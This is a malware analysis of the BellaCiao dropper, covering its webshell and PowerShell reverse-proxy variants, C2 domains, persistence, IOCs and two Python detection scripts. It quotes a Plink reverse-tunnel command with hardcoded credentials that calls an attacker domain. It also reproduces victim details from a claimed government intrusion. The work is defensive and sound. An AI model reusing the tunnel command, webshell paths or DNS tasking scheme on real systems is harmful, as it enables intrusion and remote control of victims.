
Introduction to BellaCiao

BellaCiao is a .NET-based dropper developed and deployed by IRGC-IO Counterintelligence Division (Unit 1500), Department 40. The malware has been analyzed by Bitdefender and exists in two distinct variants, each with different capabilities and deployment strategies.
The complete source code for both variants was exposed in Episode 3, providing unprecedented insight into CharmingKitten's malware development practices.

Technical Overview

BellaCiao operates as a dropper that deploys additional malicious components onto compromised systems. The malware is designed to:
  • Establish persistent access to victim systems
  • Deploy webshells for remote command execution
  • Enable file upload and download capabilities
  • Establish reverse proxy connections using legitimate tools

Variant 1: C# Webshell Dropper

Architecture

The first variant of BellaCiao drops a C# webshell that provides comprehensive remote access capabilities.
Key Features:
  • File upload and download
  • Command execution via webshell interface
  • Stealth deployment to IIS and Exchange Server paths
  • DNS-based command and control using randomized subdomains

Command & Control Infrastructure

The malware uses DNS queries with randomized subdomains for C2 communication:
string dnsdomain = ".At.twittsupport.com";
string dnsdomain2 = ".At.mailupdate.info";
string finalhost = randstr + "EX2016" + dnsdomain;
Domains Used:
  • twittsupport.com
  • mailupdate.info

Deployment Locations

The webshell is deployed to multiple locations to ensure persistence.
IIS Locations:
  • c:\inetpub\wwwroot\aspnet_client\
  • c:\inetpub\wwwroot\aspnet_client\system_web\
Exchange Server Locations:
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\

Webshell Capabilities

The embedded C# webshell supports:
  1. Command Execution - Executes system commands and returns output
  2. File Upload - Uploads files to specified paths on the victim system
  3. File Download - Downloads files from the victim system
  4. Custom Encoding - Uses character substitution for command obfuscation

Real-World Attack: Turkish Foreign Ministry

The source code includes evidence of a successful attack against the Turkish Foreign Ministry.
Target: 212.175.168.58
Webshell URL: https://eposta.mfa.gov.ct.tr/aspnet_client/system_web/aspnet_client.aspx
Commands Executed:
  • Lateral movement via WMI to internal systems (10.20.x.x network)
  • Credential usage: Admin1@MFA with password
  • Deployment of Plink for reverse tunneling
  • Access to Exchange mailbox servers

Variant 2: PowerShell Reverse Proxy

Architecture

The second variant deploys a PowerShell-based webserver combined with Plink (PuTTY Link) for reverse proxy capabilities.
Components:
  • iis.ps1 - PowerShell webserver script (734 lines)
  • Java Update Services.exe - Plink binary for SSH tunneling
  • Configuration file with C2 parameters

PowerShell Webserver

The script is a customized version of a publicly available PowerShell webserver (venom/Start-Webserver.ps1).
Features:
  • HTTP listener on 127.0.0.1:49450
  • Command execution interface
  • Script upload and execution
  • File upload and download
  • Web-based file browser
Supported Operations:
/          - Command execution
/script    - Execute uploaded PowerShell scripts
/download  - Download files from victim
/upload    - Upload files to victim
/log       - View webserver logs
The malware establishes a reverse SSH tunnel using Plink:
$domain = "twittsupport.com"
$domain2 = "msn-center.uk"
$Path = "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe"
$command = "echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!"
Tunnel Configuration:
  • Remote Port: 9090 on attacker server
  • Local Port: 49450 (PowerShell webserver)
  • Protocol: SSH over port 443 (HTTPS)
  • Credentials: Israel / Israel@123!
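The tunnel invocation above has a fixed shape that process-creation telemetry can pick out even when the Plink binary is renamed. The following is an added example, not BellaCiao's or Bitdefender's code: it parses plink-style command lines (the sample lines and their file paths are constructed around the invocation quoted above) and reports the reverse forward, the SSH port, and whether the image name hides Plink.

```python
import re

# Constructed sample command lines as they would appear in process-creation telemetry (Sysmon Event
# ID 1 / Security 4688). The first mirrors the invocation above; the others are benign lookalikes.
SAMPLE_CMDLINES = [
    r'echo Y | "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe" twittsupport.com'
    r' -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!',
    r'"C:\Program Files\Java\bin\javaw.exe" -jar C:\Users\Public\update.jar',
    r'C:\Tools\plink.exe -ssh ops@bastion.example -P 22 -N -L 8080:intranet:80',
]
VALUE_FLAGS = {"-P", "-R", "-L", "-D", "-l", "-pw", "-i", "-m"}  # plink options that take a value

def tokenize(cmd):
    # Split on whitespace honouring double quotes, then keep only the command after the last pipe
    # ("echo Y | ..." is how the dropper answers plink's host-key prompt).
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]
    while "|" in toks:
        toks = toks[toks.index("|") + 1:]
    return toks

def parse_args(args):
    opts, positional, i = {}, [], 0
    while i < len(args):
        if args[i] in VALUE_FLAGS and i + 1 < len(args):
            opts[args[i]] = args[i + 1]; i += 2
        elif args[i].startswith("-"):
            opts[args[i]] = True; i += 1
        else:
            positional.append(args[i]); i += 1
    return opts, positional

def analyze_cmdline(cmd):
    # Describe a plink-style reverse tunnel (-R) found in a command line, or None if there is none.
    toks = tokenize(cmd)
    if len(toks) < 2:
        return None
    opts, positional = parse_args(toks[1:])
    if not isinstance(opts.get("-R"), str):
        return None
    parts = opts["-R"].split(":")  # [listen_addr:]listen_port:target_host:target_port
    ssh_port = int(opts["-P"]) if str(opts.get("-P", "")).isdigit() else 22
    return {
        "image": toks[0],
        "remote_host": positional[0] if positional else None,
        "ssh_port": ssh_port,
        "reverse_listen": ":".join(parts[:-2]),  # opened on the attacker's SSH server
        "forward_target": ":".join(parts[-2:]),  # reached on the victim (here the PowerShell webserver)
        "plaintext_creds": "-pw" in opts,
        "masquerading": "plink" not in toks[0].lower(),  # plink syntax under a non-plink image name
        "ssh_on_https_port": ssh_port == 443,  # SSH forced onto 443 to blend with HTTPS egress
    }
```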

Persistence Mechanism

The malware installs itself as a Windows service:
  • Service Name: “Java Update Services”
  • Binary Location: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
  • Script Location: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
  • Alive Time: 24 hours
  • Port: 8000

Dual-Domain Fallback

Both C2 domains are attempted with automatic fallback:
  1. Primary: twittsupport.com
  2. Fallback: msn-center.uk
If the primary domain fails, the malware waits 10 seconds and attempts the backup domain.

Anti-Detection Features

Obfuscation Techniques

  1. Base64 Encoding - Webshell payload stored as base64 with noise characters
  2. Character Replacement - Uses # and @ as noise in encoded payload
  3. Random Naming - Generates random filenames for deployed webshells
  4. Timer-Based Execution - 120-hour intervals between DNS queries

Stealth Deployment

  • Deploys to legitimate Microsoft paths (Exchange, IIS)
  • Uses service names mimicking legitimate software
  • Hidden file execution for service binaries
  • Minimal network traffic pattern (timer-based callbacks)

C2 Communication Protocol

The malware uses DNS TXT records and IP address responses for command encoding.
IP Address Decoding:
X.Y.Z.110 → Deploy webshell
X.Y.81.Z  → Target Exchange Server paths
X.Y.Z.Z   → Target IIS paths
213.47.81.107 → Remove webshell
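As an added detection example covering both the randomized-subdomain beacons of Variant 1 and the IP-address tasking decoded above (not code from the page or from Bitdefender): the resolver log lines and their key=value format are constructed, and the precedence among the octet patterns is an assumption spelled out in the comments.

```python
import re

# Constructed resolver log lines in a simple key=value form (not any real product's format).
# Lines 1, 3 and 4 are BellaCiao-style beacons; line 2 is ordinary traffic that must not match.
SAMPLE_DNS_LOG = [
    "2024-03-01T08:00:00Z client=10.20.4.15 qname=k7q2xEX2016.At.twittsupport.com qtype=A answer=45.10.22.110",
    "2024-03-01T08:00:02Z client=10.20.4.15 qname=outlook.office365.com qtype=A answer=52.96.1.10",
    "2024-03-06T08:00:05Z client=10.20.4.15 qname=p0ddzEX2016.At.mailupdate.info qtype=A answer=45.10.81.110",
    "2024-03-11T08:00:07Z client=10.20.4.15 qname=a1b2cEX2016.At.twittsupport.com qtype=A answer=213.47.81.107",
]
C2_DOMAINS = ("twittsupport.com", "mailupdate.info")
# Query names look like <random>EX2016.At.<c2 domain>, the finalhost concatenation from Variant 1.
BEACON_RE = re.compile(r"^(?P<rand>[a-z0-9]+)EX2016\.At\.(?P<domain>%s)\.?$"
                       % "|".join(re.escape(d) for d in C2_DOMAINS), re.IGNORECASE)
FIELD_RE = re.compile(r"(\w+)=(\S+)")
REMOVE_SENTINEL = "213.47.81.107"

def decode_tasking(answer):
    # Translate an A-record answer into the tasking listed above. Precedence is an assumption: the
    # removal sentinel wins; a 4th octet of 110 means "deploy", the 3rd then picks Exchange (81)/IIS.
    if answer == REMOVE_SENTINEL:
        return ["remove_webshell"]
    parts = answer.split(".")
    if len(parts) != 4 or not all(p.isdigit() and int(p) <= 255 for p in parts):
        return []
    o = [int(p) for p in parts]
    if o[3] != 110:
        return []
    tasks = ["deploy_webshell"]
    if o[2] == 81:
        tasks.append("exchange_paths")
    elif o[2] == o[3]:
        tasks.append("iis_paths")
    return tasks

def scan_dns_log(lines):
    # Flag queries whose name fits the beacon pattern and decode what the answer instructed.
    findings = []
    for line in lines:
        fields = dict(FIELD_RE.findall(line))
        m = BEACON_RE.match(fields.get("qname", ""))
        if not m:
            continue
        findings.append({
            "time": line.split(" ", 1)[0],
            "client": fields.get("client"),
            "c2_domain": m.group("domain").lower(),
            "answer": fields.get("answer"),
            "tasking": decode_tasking(fields.get("answer", "")),
        })
    return findings
```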

Indicators of Compromise

Domains

  • twittsupport.com
  • mailupdate.info
  • msn-center.uk

File Paths

C:\inetpub\wwwroot\aspnet_client\aspnet.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\aspnet_client.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\owafont.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\themes.aspx
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\logon.aspx
C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1

Service Names

  • “Microsoft Exchange Agent Diagnostic Services”
  • “Microsoft Monitoring Exchange Services”
  • “Exchange Agent Diagnostic Services”
  • “Java Update Services”

Attribution Evidence

The source code release directly links BellaCiao to IRGC-IO operations:
  • Consistent infrastructure with other CharmingKitten tools
  • Shared C2 domains across multiple campaigns
  • Code comments and variables in Persian
  • Targeting patterns aligned with Iranian intelligence priorities
Organizations running Exchange Server or IIS should check the file paths listed above for unauthorized .aspx files and investigate any services with names similar to those listed.
